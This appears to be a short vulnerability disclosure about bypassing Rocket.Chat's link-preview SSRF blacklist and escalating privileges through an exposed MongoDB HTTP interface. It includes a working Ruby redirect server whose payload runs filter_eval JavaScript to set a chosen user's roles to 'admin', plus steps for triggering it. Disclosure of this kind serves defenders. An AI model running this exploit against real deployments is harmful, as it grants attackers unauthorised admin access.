Rocket.Chat SSRF in links preview and privilege escalation via misconfigured MongoDB

SSRF - bypassing blacklist

Despite introducing blacklist (https://github.com/RocketChat/Rocket.Chat/issues/1990) for links preview, it was still possible to provide domain that resolves to prohibited addresses - e.g. by setting your own domain or using service like http://xip.io.

Privilege escalation via misconfigured MongoDB

# sudo ruby redirect.rb 80
require 'rubygems'
require 'sinatra'
require 'uri'

set :bind, '0.0.0.0'
set :port, 80

get '/*' do
  redirect to("http://172.17.0.2:28017/"+payload)
end

def payload
  grant_user = 'test'
  grant_role = 'admin'
  URI.escape("rocketchat/$cmd/?filter_eval=function(){val=db.users.update({'name':'#{grant_user}'},{$set:{'roles':['#{grant_role}']}});return val;}&limit=1")
end

Point your domain to server running redirect.rb and then send a message with proper url to perform attack:

It affects MongoDB with with enabled HTTP interface (--rest argument), although it’s not enabled by default since 1.4.